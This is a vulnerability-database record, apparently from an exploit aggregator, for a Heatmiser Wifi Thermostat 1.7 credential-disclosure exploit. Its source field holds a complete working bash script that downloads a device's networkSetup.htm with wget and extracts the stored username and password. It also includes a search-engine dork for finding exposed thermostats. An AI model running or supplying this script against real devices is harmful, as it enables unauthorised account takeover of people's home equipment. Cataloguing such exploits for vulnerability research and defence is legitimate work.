DATABASE RESOURCES PRICING ABOUT US

{"id": "EXPLOITPACK:3DF4C447E9268D958103C7269F48DB7A", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "Heatmiser Wifi Thermostat 1.7 - Credential Disclosure", "description": "\nHeatmiser Wifi Thermostat 1.7 - Credential Disclosure", "published": "2018-10-16T00:00:00", "modified": "2018-10-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "d0wnp0ur", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-04-01T19:04:19", "viewCount": 5, "enchantments": {"dependencies": {}, "score": {"value": -0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.5}, "_state": {"dependencies": 1678959810, "score": 1684000228, "epss": 1678961154}, "_internal": {"score_hash": "f60ca1598d0e13ee694efb5ce7ab1957"}, "sourceData": "# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Credential Disclosure \n# Dork: intitle:\"Heatmiser Wifi Thermostat\"\n# Date: 2018-08-17\n# Exploit Author: d0wnp0ur\n# Original Discoverer: Andrew Tierney\n# Vendor Lnk: https://www.heatmiser.com/en/ \n# Product Link: https://www.heatmiser.com/en/wireless-thermostats/\n# Tested on: Heatmiser Version 1.7\n# CVE: N/A\n\n#!/bin/bash\n\necho Heatmiser Smart Thermometer Hack\necho By d0wnp0ur\necho Usage: $0 \\<ip\\[:port\\]\\> \\(Default is 80. If it doesn\\'t work, try port 8081\\)\necho This tool gets the username and password of a vulnerable Heatmiser thermostat\necho Deleting old files\nrm networkSetup.htm*\necho Copying disclosing page\nwget http://$1/networkSetup.htm\necho Getting Username and Password\necho Username:\ncat networkSetup.htm | grep \"User\" | grep \"Name:\" | awk -F 'value=' '{print $2}' | cut -d '\"' -f 2\necho Password:\ncat networkSetup.htm | grep \"User\" | grep \"Password:\" |grep -v -i \"confirm\" | awk -F 'value=' '{print $2}' | cut -d '\"' -f 2\necho Success! Log in to the web interface with the above credentials.\necho http://$1", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "webapps", "platform": "hardware"}, "hackapp": {}, "toolHref": "", "w3af": {}}

{}